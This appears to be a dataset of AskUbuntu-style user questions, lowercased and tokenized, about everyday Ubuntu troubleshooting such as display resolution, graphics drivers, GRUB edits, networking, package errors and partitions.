310320	ca n't get fullscreen resolution on ubuntu 13.04 hosted on virtualbox	i 'm running ubunutu 13.04 in virtualbox . i have it set up to run in fullscreen mode , but its resolution is much less than what my monitor is capable of and is set up to display on the host machine . when i open up settings - > displays , the highest possible resolution setting is still less than what i want it to be to get the most out of my monitor . i 've already installed guest additions . what should i do to fix this issue ?
310321	tomcat 7 and eclipse integration getting error	i had installed tomcat7 from ubuntu 's repository but when i added tomcat7 into eclipse , this dialog indicates something wrong with tomcat server configuration at /usr/share/tomcat7/conf . how should i do to fix it ?
310332	after installing ubuntu , i get a blank screen with a blinking cursor	i have a lenovo thinkcentre m91p graphics - driver : intel sandybridge desktop processor - intel core i7-2600 cpu 3.40ghz x 8 after installing ubuntu 12.04 lts , when i boot up i only get a blank screen with a blinking cursor in the upper left of the screen . no keys affect the screen . what i 've tried . - boot repair utility - set the 'nomodeset ' option http : //paste.ubuntu.com/5781810/
310335	13.04 exception with latest amd/ati driver - how do i go about reporting this ?	os - xubuntu 13.04 64-bit fresh install ( up to date ) i 'm trying to install the ati/amd graphics drivers for the laptops dedicated graphics card , but im having a really hard time . i followed the ubuntu_raring_installation_guide on a fresh install ( packages up to date ) . the installation seems to go fine . but when i reboot this happens . note . i followed the ubuntu_precise_installation_guide on 12.04 lts 64 and that worked fine testing fglinfo and the gears test all worked well . so then i updated that to 12.10 that worked fine too . i should have gone on to 13.04 with the update but i pushed my luck and went a fresh install of 13.04 and then struck problems again . *update 1 . installed xubuntu 12.10 64 and followed ubuntu_quantal_installation_guide it needed libqtgui4 but the driver works fine . *update 2 . updated xubuntu 12.10 64 to xubuntu 13.04 64 same problem as fresh 13.04 only seen this error once , after second install i did n't get it just boots saying * startingand nothing else . is this a bug cause by me ? or ubuntu or amd ? where do i point the finger ? how do i construct a useful bug report for this issue ? dell vostro 3560 , i7-3632qm , amd radeon hd 7670m 1gb bug report . https : //answers.launchpad.net/ubuntu/+question/231272 related ? http : //forums.gentoo.org/viewtopic-t-949372-start-0.html
310337	which startup applications can i safely disable ?	which startup elements can be safely deleted ( for home desktop users ) ? i use this terminal commands to see the whole startup list : sudo -i cd /etc/xdg/autostart/ sudo sed -- in-place 's/nodisplay=true/nodisplay=false/g ' *.desktop
310340	imac bluetooth keyboard problem with ubuntu	my problem is that i install ubuntu 13.04 on my imac , but when i restart my computer a screen asks me to choice between osx or ubuntu . the problem is i ca n't use the keyboard to choose osx , so i ca n't log to my mac . i hope you help me to find a solution to this problem note : 10 seconds after the appearance of the screen , it automatically selects ubuntu and the keyboard works fine inside ubuntu
310341	do graphics drivers for intel hd 4600 exist ?	i recently installed precise on an intel i7-4770 machine with a hd 4600 gpu and i 've unfortunately been experiencing the dreaded `` flickering mouse cursor '' from the beginning . i read that supposedly using the right graphics drivers for the gpu would have a high chance of fixing the issue . being pretty new to the linux graphics drivers world , i 'm not sure what exactly i should be looking for . do linux drivers specific to the hd 4600 exist in the wild , or do i instead want something like mesa as the `` next best thing '' . what other options do i have ?
310344	how do i change the password of root , using webmin in one command line ?	i have lost root password of one old server , where i can only have normal user login and via webmin login . via webmin interface i have one option to execute command , i have been trying the following but it fails : > echo -e `` newpassword\nnewpassword '' | passwd root '' bash : -c : line 0 : unexpected eof while looking for matching ` '' ' bash : -c : line 1 : syntax error : unexpected end of file > whoami root via webmin , i can see i am logged in as root
310345	unable to mount previously working drive	help , i 've been banging on this for days . i re-install either 10.04 or 12.04 and ubuntu boots fine . i pop off the cd drive and plut in the other hard drive ( 320gb/ntfs ) and initially you can see the drive in ubuntu but ca n't mount . following the fstab and virtual drive instructions : /dev/sdb /mnt/d_drive auto rw , auto , user , exec 0 0 i attempt to mount -a or /etc # sudo mount -t ntfs /dev/sdb /mnt/d_drive here is what i see for disks/partitions root @ crunch005 : /etc # sudo fdisk -l disk /dev/sda : 120.0 gb , 120034123776 bytes 255 heads , 63 sectors/track , 14593 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000ac3 device boot start end blocks id system /dev/sda1 * 1 13995 112412672 83 linux /dev/sda2 13995 14594 4805633 5 extended /dev/sda5 13995 14594 4805632 82 linux swap / solaris disk /dev/sdb : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x07147c7f device boot start end blocks id system /dev/sdb2 2937 38913 288985252+ 5 extended /dev/sdb5 2937 38913 288985221 7 hpfs/ntfs any help is much appreciated . thanks in advance !
310346	13.04 flickering mouse pointer	i 'm running 13.04 on my laptop . my laptop has a tendency to run really hot - to the point of thermal shutdowns if left unattended for a long period of time . i do n't know if that 's relevant . the mouse cursor flickers constantly . sometimes it disappears altogether . the flickering is about 1hz at rest , but as i do things or type it increases in frequency . it looks like every time the system registers a keypress it flickers . how can i fix this or diagnose what is causing this ?
310347	cant install wine1.5 13.04	so i tried to install wine 1.5 a few times , i got 1.4 installed , and 1.6 installed oddly enough , i completely removed and purged all wine and still nothing . i installed ia32-lib and still nothing , tried installing from synaptic , ubuntu software center , and apt-get method . i get this error from apt-get in the terminal reading package lists ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help resolve the situation : the following packages have unmet dependencies : wine1.5 : depends : wine1.6 but it is not going to be installed e : unable to correct problems , you have held broken packages . the particular windows program i want to install is confirmed working in 1.5 ( have it working on laptop )
310355	networking with multiple nics	i have an ubuntu 12.04 server with 4 network adapters in it . i need to use each nic for a separate function . here is a description of my setup : etho = 10.234.0.2 netmask = 255.255.255.252 gw = 10.234.0.1 this is on vlan 234 eth1 = 10.235.0.2 netmask = 255.255.255.252 gw = 10.235.0.1 this is on vlan 235 eth2 = 10.236.0.2 netmask = 255.255.255.252 gw = 10.236.0.1 this is on vlan 236 eth3 = 10.237.0.2 netmask = 255.255.255.252 gw = 10.237.0.1 this is on vlan 237 i need to be able to direct traffic to and from the individual ip addresses for separate web services . ie 10.235.0.2 is a website , 10.236.0.2 is a different site , and 10.237.0.2 is a third site . the 1st ip is for management of the server . i think the issue is a routing issue , but i am new enough to linux to not have a full understanding of the ins and outs of the routing capabilities . here is what is in my /etc/network/interfaces file : auto lo iface lo inet loopback # www management auto eth0 iface eth0 inet static address 10.234.0.2 netmask 255.255.255.252 gateway 10.234.0.1 nameseervers 10.230.1.103 , 10.230.70.70 # www auto eth1 iface eth1 inet static address 10.235.0.2 netmask 255.255.255.252 gateway 10.235.0.1 # wtb # auto eth2 # iface eth2 inet static # address 10.236.0.2 # netmask 255.255.255.252 # gateway 10.236.0.1 # moodle # auto eth3 # iface eth3 inet static # address 10.237.0.2 # netmask 255.255.255.252 # gateway 10.237.0.1 i have disabled the last two networks just to ease confusion . thanks in advance for all of the help and comments and suggestions .
310356	missing file - unable to install alongside windows 8 or on own on samsung series 9 ultrabook	i currently have a samsung series 9 ultrabook 128gb ssd and 8gb of ram . i have been trying to install ubuntu to run alongside windows but i can not get it to work properly . i tried disabling secure boot , fast bios mode , and switched to csm os mode . however , when i try to reboot and then head to os selection , i select ubuntu and get an error saying that it can not run because there is a file missing . i downloaded ubuntu straight from the website so i am completely unsure of what file is missing . if anyone else has this trouble and has fixed it or if anyone has a clue please help . yes , windows 8 came pre-installed on the samsung laptop . i am trying to install through wubi.exe .
310357	all ubuntu live cd 's 13.10 - 11.10 wo n't boot correctly or show corrupt screen	i come here posing a question . i had installed ubuntu 12.04 lts some time ago , and had this same problem . somehow i got around it but have n't been able to replicate it . now i am unable to install ubuntu 13.10 - 11.10 on my dell vostro 3555 even with `` nomodeset '' `` apci=off '' and others . the attached picture shows what it results in if i use `` nomodeset '' . this is n't the only thing that has happened . if i do n't set other options , it just hangs on the ubuntu splash screen . if anyone has any way to help me install ubuntu , that would be appreciated .
310359	uninstall ubuntu from imac without boot	is there any way to remove ubuntu form may imac without boot please read this question to know what iam talking about here
310363	how to install older version of firefox in ubuntu 12.04	i am using firefox 21 but i faced more problems with firefox like many times hang or slow working the browser so i want to install older version means firefox 20 after remove firefox 21 version . please tell me the procedure of above work .
310365	why ca n't i boot xubuntu from a flash drive after installing with wubi	why ca n't i boot xubuntu 12.04 when i install it to my flash drive with wubi ? it works just fine when i install it with unetbootin but not with wubi . when i try to boot from the flash drive , it says `` missing operating system ''
310371	cant install ubuntu on my blank hdd	i have wiped my hdd and i downloaded the ubuntu iso to my flash drive . when i start my pc and load the boot menu i press boot from usb and it will just keep blinking in the corner of the screen till i shut it down what should i do ?
310374	why ca n't i delete the default `` places '' in files ?	i want to delete the default places in the files application and the word `` remove '' is there but it wo n't let me click on it . i 'm trying to get the default music , desktop etc . folders to point to my other hard drive with those files on it .
310378	ca n't stream video from hbo go on ubuntu 13.04	i 'm running ubuntu 13.04 on an ideapad p500 . i have watched videos from hbo , but suddenly my computer stopped streaming them . i do get the introductory hbo screen , but then it shows the message `` optimizing video quality '' forever . first i thought it was the tv company , but i was able to stream it on another computer ; together with a few blogposts that i found , i come to think the problem lies in my computer . i tried checking the flash plugins , but could n't find anything . and then i even did a clean reinstall of ubuntu 13.04 , and still with no luck . i have searched around , but i am not an expert on such matters . any help will be apppreciated . thank you and have a nice day .
310380	how can i install 12.04.2 ?	i have never installed an os before . i upgraded to 13.04 and it has been a total disaster . i now want to go back to 12.04.2 , but will have to install it totally . i tried following the instructions , but the computer does n't do anything that instructions tell me to do . i have downloaded it to a flash drive , but there seems to be no starting point that i can identify . where do i start ? also , is it possible to download it directly from the hard drive , or does it have to be from an external source ? thank you .
310386	how can i resize my filesystem partition ?	so , when i installed ubuntu a long time ago , i made five partitions . system reserved 500 mb windows 8 partition 250gb ubuntu swap 5 gb ubuntu `` / '' 10 gb ubuntu `` home '' 40 gb i only got 1 gb free on my `` / '' partition and i would like to resize the `` home '' partition to give at least 10 to 15 gbs more to the `` / '' partition ... what should i do ?
310390	problem upgrading from ubuntu 12.10 to ubuntu 13.04	when i tried to upgrade from ubuntu 12.10 to ubuntu 13.04 i got the following error message : e : unable to parse package file /var/lib/apt/lists/gt.archive.ubuntu.com_ubuntu_dists_raring_universe_i18n_translation-en ( 1 ) , e : the package lists or status file could not be parsed or opened . and now i ca n't update , install or uninstall software . how can i fix this ?
310393	no unity , launcher and dash on ubuntu 13.04 within virtualbox4.2.12 after enabel 3d acceleration	i was using ubuntu 12.10 in my virtualbox4.2.12 on my windows7 host . they worked good . but when i install ubuntu 13.04 in virtualbox 4.2.12 , the screen and display are very slow . i have followed this post < how do i resolve slow and choppy performance in virtualbox ? > to enable 3d acceleration . now the performance issue is resolved , but the unity , launcher and dash are gone . i have tried to disable 3d acceleration , the unity can be displayed , but the performance issue come again . please see my screenshot . is there anyone has the same issue ? i have searched the answer from this site , all the answers are pointed to how do i resolve slow and choppy performance in virtualbox ? please help me , thanks .
310397	how to make 7zip behave like bzip ( to zip a file and delete the original ) ?	i like to use bzip to zip up files because it deletes the original and leaves the new file . how can i use 7zip to zip up a file and delete the original after it is done zipping ?
310404	permission denied error when compiling fortran code in netbeans 7.3.1 on ubuntu linux 12.04.2	so i read through a bunch of posting about similar issues , but none of them seemed to fix this problem . i am running netbeans 7.3.1 on ubuntu 12.04.2 x64 . i wrote some fortran code and saved it to an ext4 internal drive that i have . however , when i try and run the code through netbeans or even from the console , i tend to get a permission denied error . but , when i save and compile the code in my home directory , it seems to run just fine . now as a pre-empt to the common issues . the partition that is having the trouble is an ext4 partition , so it is not a fat or ntfs partition where i can not run executables from ubuntu . second , the drive is set for permission to run executables . i mount the drive through pysdm and the run binaries flag is enabled . i am not sure how to check the drive settings though . i am including some samples of the console output when i compile the file and when the execution error comes up . `` /usr/bin/make '' -f nbproject/makefile-debug.mk qmake= subprojects= .build-conf make [ 1 ] : entering directory `/media/jaimini/workspace/netbeans/hello_1' '' /usr/bin/make '' -f nbproject/makefile-debug.mk dist/debug/gnu-linux-x86/hello_1 make [ 2 ] : entering directory `/media/jaimini/workspace/netbeans/hello_1' make [ 2 ] : `dist/debug/gnu-linux-x86/hello_1 ' is up to date . make [ 2 ] : leaving directory `/media/jaimini/workspace/netbeans/hello_1' make [ 1 ] : leaving directory `/media/jaimini/workspace/netbeans/hello_1' here is the run attempt : /bin/sh : 1 : exec : /media/jaimini/workspace/netbeans/hello_1/dist/debug/gnu-linux-x86/hello_1 : permission denied run finished ; exit value 126 ; real time : 0ms ; user : 0ms ; system : 0ms any suggestions . this is really messing up my workflow . thanks .
310408	upgrade php 5.3 to 5.4 via putty	i am using ubuntu 10.04.1 lts server with php version 5.3.2-1ubuntu4.19 apache/2.2.14 ( ubuntu ) . i login to the server via putty and want to upgrade to php 5.4 . i could not find the right commands from google.i am not expert in linux please help me step by step .
310415	irods request libodbcpsql.so	i 'm trying to install irods on my ubuntu system . i get an error when testing databases communications . error : cllconnect : sqlconnect failed : -1 error : cllconnect : sqlconnect failed : odbcentry=postgresql , user=xxxxxxxx , pass=xxxxxxxx error : cllconnect : sqlstate : 01000 error : cllconnect : native error code : 0 error : cllconnect : [ unixodbc ] [ driver manager ] ca n't open lib '/usr/lib/postgresql/9.1/lib/libodbcpsql.so ' : file not found i tried installing unixodbc and odbc-postgresql but i ca n't find libodbcpsql any where . where/how can i find it ?
310418	whole system is read only	my whole system is read-only so i ca n't even connect to wifi ( needs authentication ) . so i went into the terminal : sudo su nautilus it sat there for about 20 seconds with no output then it had a bunch of errors then nautilus started . i used that to go into /usr/shared/applications ( or whatever ) to launch `` disks '' and it says nothing about being read-only . so im running on the terminal now as i ca n't use anything that writes settings or anything to the hdd .
310423	any open window and program is gone when i close my laptop lid ( suspend ) . what should i do ?	i have just switched to ubuntu 13.04 from windows 8 and i 'm very new to this os . when i put the computer to sleep ( suspend ) by closing my laptop lid , it seems that all it does is shutting the computer off rather than going to stand by and keeping my open programs . what should i do to fix this issue ? by the way , i have already checked power settings and everything seems to be fine there and theoretically this should not happen . [ p.s . i have a sony vaio vgn-nw150j ]
310428	i can not move icons in unity launcher .	my launcher was very smooth.but yesterday onwards launcher become darker and not smooth.i ca n't move the icons as to rearrange it 's position .
310429	could not initialize the package information error when loading update manager	e : malformed line 37 in source list /etc/apt/sources.list ( dist parse ) , e : the list of sources could not be read. , e : the package lists or status file could not be parsed or opened . '
310431	how do i use qtmultimedia in qml ?	the link here says that i should use qtmultimedia 5.0 . is there a tutorial or example that i can use that shows how to do it ?
310435	how do you add lines to /etc/default/grub so they 're reflected in /boot/grub/grub.cfg ?	my question is about how to add a few lines to the /etc/default/grub file so that it is automatically reflected each time /boot/grub/grub.cfg is regenerated . the details : i 'm running ubuntu on a macbook pro 8.2 and one of the things that i had to do to get it to run correctly was alter the grub.cfg so that it only loads one of the two graphics cards . to turn off one of the cards i added the text concerning i915 in the grub_cmdline_linux_default /etc/default/grub : grub_default=0 # grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash i915.lvds_channel_mode=2 i915.modeset=1 i915.lvds_use_ssc=0 '' grub_cmdline_linux= '' '' the problem is that i must also have the following adding to /etc/grub.cfg : outb 0x728 1 outb 0x710 2 outb 0x740 2 outb 0x750 0 which i 've added in context in grub.cfg as so : menuentry 'ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-1e8685ef-b6a8-4bf3-abb8-62d0212cea7c ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod reiserfs outb 0x728 1 outb 0x710 2 outb 0x740 2 outb 0x750 0 set root='hd0 , gpt4' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt4 -- hint-efi=hd0 , gpt4 -- hint-baremetal=ahci0 , gpt4 21c34907-4da5-4356-b1c8-a5d2747411ed else ... how can i add this to the /etc/default/grub file so that i do n't have to manually add it to the grub.cfg every time ubuntu updates ? currently it appears as if each time ubuntu updates it regenerates the /boot/grub/grub.cfg file from the /etc/default/grub file and it 'd be helpful if these four lines could be included as well .
310439	issue with app in the software center	hey i got my app published in the software center , ( yay ! ) but now i have a different . problem . when you go to download my app it says its free but but the button says buy where it normally says install . so it makes installing my app tedious and annoying . can i get some help fixing that ? my app is called linux disk cleaner if you need to see my problem . thanks , brooks rady
310441	install python 3.3.2 on ubuntu	how to update to python 3.3.2 in ubuntu ? i tried sudo apt-get install python3 but it says that the current ( 3.3.1 ) is already the latest .
310442	intel i217lm ethernet controller not detected by ubuntu 12.04lts	my last installation of ubuntu 12.04 on a machine using an asus q87m-e motherboard with an intel i217lm ethernet controller has failed to detect the ethernet card . the only thing displayed by ifconfig -a is the loopback . i double-checked in the bios , and the controller should be online . $ rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no $ lspci 00:00.0 host bridge : intel corporation haswell dram controller ( rev 06 ) 00:01.0 pci bridge : intel corporation haswell pci express x16 controller ( rev 06 ) 00:02.0 vga compatible controller : intel corporation haswell integrated graphics controller ( rev 06 ) 00:03.0 audio device : intel corporation haswell hd audio controller ( rev 06 ) 00:14.0 usb controller : intel corporation lynx point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation lynx point mei controller # 1 ( rev 04 ) 00:16.3 serial controller : intel corporation lynx point kt controller ( rev 04 ) 00:19.0 ethernet controller : intel corporation device 153a ( rev 04 ) 00:1a.0 usb controller : intel corporation lynx point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation lynx point hd audio controller ( rev 04 ) 00:1d.0 usb controller : intel corporation lynx point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation lynx point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation lynx point 6-port sata ahci controller ( rev 04 ) 00:1f.3 smbus : intel corporation lynx point smbus controller ( rev 04 ) $ lsmod module size used by vesafb 13844 1 snd_hda_codec_realtek 224173 1 arc4 12529 2 joydev 17693 0 usbhid 47238 0 hid 99636 1 usbhid rfcomm 47604 0 rt73usb 31735 0 crc_itu_t 12707 1 rt73usb rt2x00usb 20808 1 rt73usb rt2x00lib 55326 2 rt73usb , rt2x00usb mac80211 506862 2 rt2x00usb , rt2x00lib cfg80211 205774 2 rt2x00lib , mac80211 eeepc_wmi 13109 0 bnep 18281 2 asus_wmi 24456 1 eeepc_wmi sparse_keymap 13890 1 asus_wmi psmouse 97485 0 bluetooth 180153 10 rfcomm , bnep ppdev 17113 0 snd_hda_intel 33719 6 snd_hda_codec 127706 2 snd_hda_codec_realtek , snd_hda_intel snd_seq_midi 13324 0 snd_hwdep 17764 1 snd_hda_codec snd_rawmidi 30748 1 snd_seq_midi serio_raw 13211 0 snd_pcm 97275 2 snd_hda_intel , snd_hda_codec snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 61929 2 snd_seq_midi , snd_seq_midi_event snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14540 3 snd_seq_midi , snd_rawmidi , snd_seq parport_pc 32866 1 snd 79041 21 snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_rawmidi , snd_pcm , snd_seq , snd_timer , snd_seq_device video 19651 0 soundcore 15091 1 snd wmi 19256 1 asus_wmi snd_page_alloc 18529 2 snd_hda_intel , snd_pcm mac_hid 13253 0 lp 17799 0 parport 46562 3 ppdev , parport_pc , lp $ ifconfig lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1091 errors:0 dropped:0 overruns:0 frame:0 tx packets:1091 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:80048 ( 80.0 kb ) tx bytes:80048 ( 80.0 kb ) wlan0 link encap : ethernet hwaddr 00 : fd:07:91 : a8 : b9 inet addr:172.16.42.4 bcast:172.16.42.255 mask:255.255.255.0 inet6 addr : fe80 : :2fd:7ff : fe91 : a8b9/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:56644 errors:0 dropped:0 overruns:0 frame:0 tx packets:36417 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:85270918 ( 85.2 mb ) tx bytes:3413849 ( 3.4 mb ) additionally , running sudo lshw -c network returns : *-network unclaimed description : ethernet controller [ ... ] i 'm pretty stumped at this point . this does n't sound like a very uncommon ethernet controller and i figured it would be picked up by the system . does anybody have advice for how to deal with this ? anything specific i should look into to figure out what could be causing this ? edit : it seems that following the guide on the intel e1000e drivers page allowed the card to start working . is this a real fix or is there a better way ?
310446	how to install alien in ubuntu 13.04	while running sudo apt-get install alien , there is an error : unable lock administrator directory ( /var/lib/dpkg/ ) , is another process using it ? how do i fix this ?
310453	ubuntu software-center not installed	i 'm new to ubuntu . i installed ubuntu 12.10 version . ubuntu software-center not displayed on my left panel . i searched for it , but nothing displayed . can any one help me to solve this problem . is there any other way to install software-center in my machine ? thanks & regards , lokesh
310454	how to open exe files in ubuntu 13.04	please tell me how to open or access exe files on ubuntu 13.04 desktop .
310463	my ubuntu box is not opening in graphical mode	i copied a big data in /temp of my rhel vm . now my system stopped booting in graphical mode . can anyone tell me , how can i delete /tmp of my vm without affecting my vm . thanks
310465	help understanding line in .bashrc	i 've tried looking everywhere to determine what this line does in my .bashrc . the reason i want to know is because now ~/.pam_environment is recommended . this is the line : [ [ -s /home/ $ user/.nvm/nvm.sh ] ] & & . /home/ $ user/.nvm/nvm.sh i think i 've narrowed it to the condition checks to make sure the nvm.sh file exists and that it is larger than 0 bytes . but i do n't understand what follows . & & normally means `` and '' but i do n't understand why that would be necessary after a check and also why the . is not attached to the filename . basically what i want to know is , how would i put this in my .pam_environment file which only takes assigment expressions . edit : this line currently allows me to run nvm from the terminal but i 'd really like to know just for the sake of learning .
310470	newly opened applications open in background	i 'm running ubuntu 13.04 on an asus x201ep . often , when i launch a program ( usually chromium or the file manager ) it will open in the background , behind the currently opened window . this is very annoying ! for example , i might download a file in chromium , then from within the browser , click `` show in folder . '' this will open the file manager behind the browser window , meaning i have to go click on the `` files '' icon on the left side of the screen to see my downloaded file . it 's not a huge deal , but it 's one of those little annoyances that bugs me throughout the day . has anyone ever had this problem ? i 've tried googling `` app opens in background , '' and other similar searches , but i have n't been able to find anything . any help is appreciated !
310471	error : opening the cache	i got the following error message : error : opening the cache ( e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/dl.google.com_linux_talkplugin_deb_dists_stable_main_i18n_translation-en % 5fus e : the package lists or status file could not be parsed or opened ) . e : _cache- > open ( ) failed , please report .
310472	dual boot windows 8 and ubuntu not see partitions 1	i installed windows 8 and then installed ubuntu .the pc directly runs ubuntu , it does not ask which system should it run . ubuntu is the latest version . it runs in too slow ; if i open any application . it takes 3 to 5 minutes to open . my pc configuration is 4gb ram , 320gb hard disk . please help
310473	ip address problem after messing with /etc/network/interfaces	i have messed up my ip address . i had a dynamic ip that i changed to a static one . when i did that , the little icon in the corner of the screen that indicates a wired connection disappeared and was replaced by the wireless icon . then , it started giving me problems so i decided to get a dynamic ip again . so i deleted everything in the /etc/network/interfaces file until only auth eth0 was there . now , i have an ubuntu internal error message .
310475	how to install pantheon-greeter in 13.04 raring ?	refer here : question those are the exact step i did in my install - a raring x64 server install + all needed xorg packages to run a gui + mate 1.6 . basic lightdm + unity-greeter is flawless , as well as the other lightdm greeter available under ubuntu , and i also use gala window manager from the eos ppa , but pantheon-greeter fails to start from lightdm . i am able to run it from a terminal window within a session , just never from lightdm - it always shows the message `` unable to start job '' .
310481	ubuntu not connecting to wireless after restarting networking service	there was a problem with my internet connection and i thought that restarting the networking service might fix the problem . so i used sudo service networking restart command . however , my window manager crashed and i had to restart laptop to get it back . the problem is , ever since after that i have n't been able to connect to my wifi . anybody knows a solution to this ? edit : i can see the wireless networks . when i connect to mine , ubuntu keeps asking me for password even though i enter the right password .
310483	saving keyring password	i have found the answer to this but i 'm posting it here in case others have the same issue and also asking if anyone has any more details ; - ) i use firefox and thundirbird 's `` gnome keyring password integration '' plugin by guillermo molina available here : https : //addons.mozilla.org/en-us/firefox/addon/gnome-keyring-integration/ everything has been working perfectly except that every time i start firefox or thunderbird i have to enter my keyring password , even if it 's the same as my login password . i could find nothing online about automatically loging in to keyrings other than the default 'login ' keyring i was about to post a question here when i noticed the little details drop down in the bottom of the password prompt . looking here i found four options , the first of which was `` automatically unlock keychain at login '' or something to this effect . setting this solved the problem , even if the keyring 's password is not my login password . now if anyone can tell me how to change this back again now that it 's set and the password prompt does n't popup any more i 'd be very grateful . : - )
310484	how to delete extended partition in ubuntu 12.04	i want to delete my extended partition of ext4 in ubuntu . i using disk utility but ca n't delete or format . please tell me the procedure through terminal .
310485	unable to locate or fetch any package when ubuntu on vmware	i started out trying to install cloudbiolinux/cloudman/galaxy on 11.04 or 12.04 enterprise or mass versions of ubuntu server on a vmware . i am unable to move from step 1. sudo apt-get command either does not locate or does not fetch any thing . and any command i use asks me to apt-get as is not available . i have essentially scanned all google and tried everything suggested ( albeit with little understanding ) please advise .
310489	tp-link mr3020 wireless setup on ubuntu 12.04 lts	i`m very much new this ubuntu planet , just trying to out of windows planet ... indeed , ubuntu is working great and easy to install.but i was unhappy on configuring wireless router setup . i`ve tp-link mr3020 router but unable to use with ubuntu . please help on setup/router config . many thanks ...
310490	unable to start libvirtd	when i try to start libvirtd using sudo libvirtd i get this error message : 2013-06-20 06:16:12.384+0000 : 10470 : info : libvirt version : 1.0.2 2013-06-20 06:16:12.384+0000 : 10470 : error : virpidfileacquirepath:410 : failed to acquire pid file '/var/run/libvirtd.pid ' : resource temporarily unavailable i am using ubuntu 12.04 as a virtual machine and running openstack on top of it , which has some instances running in it . what might be going wrong here and what can fix this ?
310491	stopwatch for command prompt ?	is there a stopwatch , so that i can measure time taken for different commands for bash shell ?
310492	webcam software	i am keen to use my web cam but can not find any suitable software to facilitate this , could someone please suggest any other applications ? i have tried the software site associated with the ubuntu software center but alas my web cam program still eludes me ... .help
310496	google chrome browser , how to permanently disable this disturbing toolbar ?	in my ubuntu google chrome browser , often showing a disturbing toolbar , i am running it in command line kiosk mode . how can i via command line mention never to show such toolbars ? ( after pressing x it disappear but again when page refresh it shows up , how can i disable those toolbars completely via command line launch ? )
310497	after update ( 13.04 ) ended up with a grub.cfg that grub says has invalid commands	installed ubuntu 12.10 on a asus vivobook ( x202e , but many similar models around ) by resizing the original windows8 partition , disabled safeboot , and installed in efi mode . this is my partition table model : ata hitachi hts54505 ( scsi ) disk /dev/sda : 500gb sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 1 0.00gb 0.32gb 0.31gb fat32 efi system partition boot 2 0.32gb 0.94gb 0.63gb ntfs basic data partition hidden , diag 3 0.94gb 1.08gb 0.13gb microsoft reserved partition msftres 4 1.08gb 201gb 200gb ntfs basic data partition 5 201gb 210gb 8.39gb linux-swap ( v1 ) basic data partition 6 210gb 262gb 52.4gb ext4 basic data partition 7 262gb 479gb 217gb ext4 basic data partition 8 479gb 500gb 21.5gb ntfs basic data partition hidden , diag at first i could n't boot windows 8. but a search here pointed me to edit the custom40 file in /etc/grub.d to add insmod part_gpt insmod ntfs root ' ( hd0 , gpt4 ) ' ( and here i think it was chainloader +1 , not sure ) all was fine , until the 13.04 update . now i have the following in grub.cfg : cat /boot/grub/grub.cfg ... menuentry 'windows 8 ( loader ) ( on /dev/sda4 ) ' -- class windows -- class os $ menuentry_id_option 'osprober-chain-bee60b1ae60ad317 ' { insmod part_gpt insmod ntfs set root='hd0 , gpt4' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt4 -- hint-efi=hd0 , gpt4 -- hint-baremetal=ahci0 , gpt4 bee60b1ae60ad317 else search -- no-floppy -- fs-uuid -- set=root bee60b1ae60ad317 fi drivemap -s ( hd0 ) $ { root } chainloader +1 } and my 40_custom file is gone ! well , not gone , but it has the initial contents ... when i select this option , i get ca n't find command 'drivemap ' and invalid efi file path i think there are a few questions now : 1 ) why the update removed my custom grub file ? 2 ) why grub generates a config file with a command that it has no clue about ? 3 ) what do i do to fix that ? for number 3 , if i may be picky , i 'd like something with a little more insight than install boot-repair and i 'd really like to start to build my knowledge of gpt and efi to the level i had it with ( sane ) partitions . really appreciate any input here .
310498	change terminal colour based on ssh session	is it possible to automatically change the color of the terminal based on which server i am connected to through ssh ? for instance , when i fire up the terminal it has the standard colors defined under my profile . then i ssh to ssh.example.com and the color changes to black & green instead . then i exit the session and the color returns to the standard color theme . i know that you could do this manually . but i 'm looking for an automated way .
310501	how to format text within the thunderbird conversations view ?	i am trying to make a move from gmail to my own email , and for this i am testing thunderbird on ubuntu . since i really like the gmail style i installed the conversations view extension . so far so good . today i was writing an email though , and i could not find any formatting options . when i switch off the conversations view i 've got the formatting options again , but with the conversations view enabled i ca n't see them . also , normal key-combinations like ctrl+b and ctrl+i do n't do anything . does anybody know how i can make text bold or italic in the conversations view ? all tips are welcome !
310503	mem vs cache in system monitor ?	in the above menu , what does the difference between mem and cache ? are they both use memory from my ram ? which program use cache ?
